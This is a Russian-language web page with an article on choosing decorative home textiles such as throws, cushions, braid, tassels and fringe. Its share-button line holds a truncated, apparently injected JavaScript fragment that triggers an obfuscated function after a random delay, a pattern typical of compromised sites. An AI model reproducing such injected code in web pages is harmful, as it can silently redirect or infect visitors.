www.osnovosti.ru
smk-pride.ru

Текстиль для уюта в Вашем доме

552x214-0-textile
Для создания единой композиции интерьера необходимо грамотно подобрать текстильные аксессуары.

c34da7f3d241-520x346
Благодаря таким декоративным элементам, как скатерти, подушки, портьеры дизайн интерьера жилого помещения приобретает оригинальность и индивидуальность . Домашний текстиль – важная часть обстановки дома. Декорирование помещения только тогда стильно и эффектно, когда учитывается каждая мелочь.
Текстильные аксессуары вносят разнообразие в обстановку и делают домашнюю атмосферу теплой и уютной.
Для того, чтобы придать оригинальность и элегантность обстановке дома, можно использовать всевозможные приемы. Например, украсить портьеры красивой тесьмой, диваны и кресла — пышной бахромой. Декоративные элементы должны быть подобраны со вкусом и в меру.
Текстильные аксессуары следует выбирать в период создания проекта интерьера, ведь их стиль и цветовое решение должны гармонировать с отделочными материалами, с мебелью. Помочь в этом вопросе может как профессиональный дизайнер, так и специалисты салонов домашнего текстиля.
Одним из символов домашнего уюта является плед. Он может быть как классического, так и оригинального дизайна. Для изготовления пледов используются различные материалы – шерсть, велюр, акрил и другие. Чем больше в составе нитки натуральных волокон, тем теплее плед. Изделия из ткани разных волокон характеризуются самыми лучшими показателями – высокой плотностью, прочностью, длительным сроком службы. Пледы могут быть украшены красивой бахромой. Это изделие не только дарит тепло в прохладный день, но и может накрывать, например, кресло у камина, что придает обстановке чувство домашнего комфорта.
Отдых в доме делают особенно приятным и разнообразят дизайн интерьера удобные и красивые декоративные подушки. Подушки имеют богатый ассортимент расцветок и размеров, формы. Это позволяет выбрать изделие, соответствующее стилю. Расцветка подушки должна гармонировать с отделкой стен, обивкой мебели и другими элементами интерьерного текстиля. Для чехлов нужно выбирать прочные и натуральные ткани, которые легко стираются. Оригинально выглядит комбинирование нескольких видов ткани.
Текстильная фурнитура украшает предметы обстановки, подчеркивает стиль дизайна интерьера, делает его неповторимым. Это понятие включает в себя большое количество изделий текстиля. К текстильной фурнитуре относятся ленты, шнуры, бахрома и многое другое.
Лента из плотной ткани называется тесьмой. Тесьма может быть и плетеной. Ширина ее от 6 до 55 мм. Тесьму и ее разновидность, кант, используют для декорирования штор, покрывал. Стилистическое решение, которое имеет дизайн интерьера квартиры, влияет и на выбор данного вида фурнитуры.
При декорировании интерьера разных стилей используются кисти. Они изготавливаются из различных волокон, шнуров, металлизированных нитей, перьев птиц. Кистями украшают чехлы мебели, подушки и другие предметы.
Широкое применение имеет и бахрома. Ее нужно правильно подбирать к разным видам ткани – легким, прозрачным, плотным. Благодаря тому, что производят данное изделие из разных нитей и разного дизайна, сделать такой подбор не сложно.
Текстильные аксессуары и фурнитура не должны перенасыщать интерьер, делать его тяжеловесным. Эти изделия используются обычно как тонкий нюанс и изюминка дизайна дома.

Источник статьи ООО «Стар Текс»

Share andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}and Enjoy:
  • Добавить ВКонтакте заметку об этой странице
  • Twitter
  • Facebook
  • Яндекс.Закладки
  • Одноклассники

Добавить комментарий

Ваш e-mail не будет опубликован. Обязательные поля помечены *

Этот сайт использует Akismet для борьбы со спамом. Узнайте, как обрабатываются ваши данные комментариев.

Яндекс.Метрика